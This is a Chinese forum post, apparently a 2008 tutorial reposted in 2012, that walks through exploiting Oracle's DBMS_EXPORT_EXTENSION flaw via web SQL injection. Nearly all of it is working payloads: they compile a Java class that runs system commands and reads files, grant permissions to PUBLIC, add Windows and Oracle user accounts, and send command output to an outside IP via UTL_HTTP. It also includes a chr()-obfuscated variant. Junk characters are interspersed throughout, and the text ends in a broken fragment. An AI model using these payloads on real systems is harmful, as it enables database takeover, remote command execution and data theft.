以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 - U ?4 U- l% n4 ^
, `- I. m5 l0 E- U+ F
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) + [+ {) [* o9 L' I+ t9 C
的形式即可。(用" 'a'|| "是为了让语句返回true值) , l) W7 I6 k W7 r* }2 |
语句有点长,可能要用post提交。
6 L# P# v' g' X# ~# E& x以下是各个步骤: 8 f+ O) A3 g! Y% Y9 l: ] q( Y
1.创建包
@4 }/ j) p2 d' Q' b% r通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
. y4 l& o' K% [$ W R! O/xxx.jsp?id=1 and '1'<>'a'||(
9 N! o) A2 P" j0 O( E$ n5 `$ l7 G- tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ Z- o6 _$ i- G, _
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(6 J. y5 l% a. J$ j; h# x% s3 D; S
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}7 d, \, _6 ^# V$ h
}'''';END;'';END;--','SYS',0,'1',0) from dual 7 J" O7 R' q5 ^* D ?# k
) 0 m1 A. j' g" q9 v g8 P
------------------------ " |+ p2 B& t8 b% s& p
如果url有长度限制,可以把readFile()函数块去掉,即: * u' n, M6 F. {; X% q; B
/xxx.jsp?id=1 and '1'<>'a'||( & n) F) J: U: T) O' J. M" l/ t; K
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 m4 u! A* p7 m
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader( J2 I- I) V$ F. z
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
3 ^8 R6 }4 A' Z' u0 _& `4 Z}'''';END;'';END;--','SYS',0,'1',0) from dual
& A- g" [* j4 I) % K' b; O) E5 P3 G. R: k) i# y
同时把后面步骤 提到的 对readFile()的处理语句去掉。 3 j; m0 f5 p6 I% ]! y
------------------------------ 3 p9 N1 p! Y9 |6 t
2.赋Java权限
! t( x; u# Z; n! H: ^" Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
' A0 U" Z. Y* j, }& s" |3.创建函数 2 a' `1 Z9 h0 |! ~% v# S
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" r" d9 K3 i1 W
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
: B6 B0 P" ^3 A( t. Y. C# xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& ]: w+ E) `$ o$ N3 a6 D$ w2 E. }. rcreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual$ h. B, t" u ` {7 y
4.赋public执行函数的权限 C. a0 t% A# v2 @: }1 l9 Z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
0 S( q, P" ^2 m, e8 j* mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
0 w3 E6 k+ u: G: v5.测试上面的几步是否成功
3 T* _ h1 N$ m8 E/ yand '1'<>'11'||( $ [8 L4 d! \( o1 ^* T3 U
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD' k: B1 n$ `2 B' S- G9 _
)
5 G: A" N- ?+ u' nand '1'<>(
\/ p. K0 V$ |& ]3 Iselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' 1 q2 i/ m0 ^8 B& s* m' o+ J
)
7 Q. D) T$ O2 l# l5 ^2 H8 e6.执行命令:
9 j* a# m6 z G4 m/xxx.jsp?id=1 and '1'<>( 0 D- m/ Z' I0 F) N
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
7 w. o; G; g& O! e S' z, p: P. E* W, R4 x" I
)
. H- y4 I8 S. m3 U0 W3 P3 T( ?$ m/xxx.jsp?id=1 and '1'<>(
6 q; h* `4 i$ P- Yselect sys.LinxReadFile('c:/boot.ini') from dual! p7 l! H- F% i3 A; n
. e" Q; W: H" |! D7 ?
)
0 E3 U. `! c- ?" _& J 7 C* ?6 H$ ^$ V! R
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 0 J1 r! b" V; w7 u& q/ b
如果要查看运行结果可以用 union : . H ~2 ?: Y/ s& m$ _) w6 m5 a
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual8 G" |1 v( F- t7 F* V' b
或者UTL_HTTP.request(: 5 i4 a; U, v+ w: T8 U4 d
/xxx.jsp?id=1 and '1'<>( . I2 Q2 t O' `0 n3 p& C
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual) @# k, I, }& u# j2 W6 y( `1 q; q9 ?, l
) , w7 x' j% ?( D i" r- R) T8 ?
/xxx.jsp?id=1 and '1'<>(
# F3 a) n, K4 Y: ]0 `0 }6 r& VSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
0 l$ ?! O9 {3 R3 p)
+ x( V7 D4 W. x/ K+ o注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。* o" B4 }# u$ b$ a, M6 |
--------------------
9 I! p9 S+ S9 L! _7 y8 y$ T( K3 S6.内部变化 % [- M o+ {7 `8 R6 v' t
通过以下命令可以查看all_objects表达改变:
- w# Z3 e: f& h2 F- |+ f7 cselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'- m5 {0 D/ v/ v- f
7.删除我们创建的函数 / x3 _: N+ j) n
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' C( E. z. Q# m) g
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual 0 A: m2 o3 D7 Y# M6 b0 |5 \
==================================================== 0 S- [/ n/ v6 M8 I( Z W
全文结束。谨以此文赠与我的朋友。 4 ~1 p7 b- }- m$ t% V
linx 7 K- f. u8 a1 G; m
124829445 $ n6 s* |1 T, P4 L
2008.1.12
$ j/ b+ F1 n& ]3 e- O% Ylinyujian@bjfu.edu.cn * a# `* A9 O8 y' |( H) Z
====================================================================== % [* q9 U c4 X# h5 I4 y
测试漏洞的另一方法: , e: g7 K! E$ ?& g; _2 P- L
创建oracle帐号: ' D! B' K* z: l0 J' j
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' {- y5 @6 k3 J# p
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual/ a( {, v/ ^$ E4 {1 E; i
即:
8 R/ G( q7 V3 e$ Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),6 ]! x+ z- F, i
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual * R9 a& r; g: b( X# s- e. _
确定漏洞存在: `5 w0 Z2 p$ l
1<>( ' ~3 d, t4 v. c6 }* e* [* `
select user_id from all_users where username='LINXSQL'
; y; B" P o0 p+ E3 o/ N) " p6 P$ Q+ |5 [) ]6 F; G) N
给linxsql连接权限:
& y* B$ J/ h( h' P q5 O$ _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: Q( Y2 w; [3 L" r7 E; N8 _GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual $ {$ K- s6 S" F! G, m) p, i! d
删除帐号:
: c2 z1 |% C/ D% r8 n2 `select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# h0 D3 T4 I2 L8 `5 b( H4 Y
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
: z" O: \1 O( R' k& W====================== 8 G" v, w# h' k4 `# [9 O+ ^
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
. L. W- F: v; V" w1.jsp?id=1 and '1'<>( 9 l7 o8 R) g0 Q' R$ C$ o' m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 P; \9 H" {/ E% H
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
0 I" m& E6 y9 f1 ?) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE6 C7 @9 y+ F/ A# z& D
)
7 U7 j+ T* N; v% x, B* ?1 {5 A! O0 l6 e, E: p+ @5 B, u
1 k5 e E0 j( _$ s5 z
% i+ _; V: n3 ?5 ^* U# T% s* z |
发表于 2012-12-18 12:21:48
收藏
支持
反对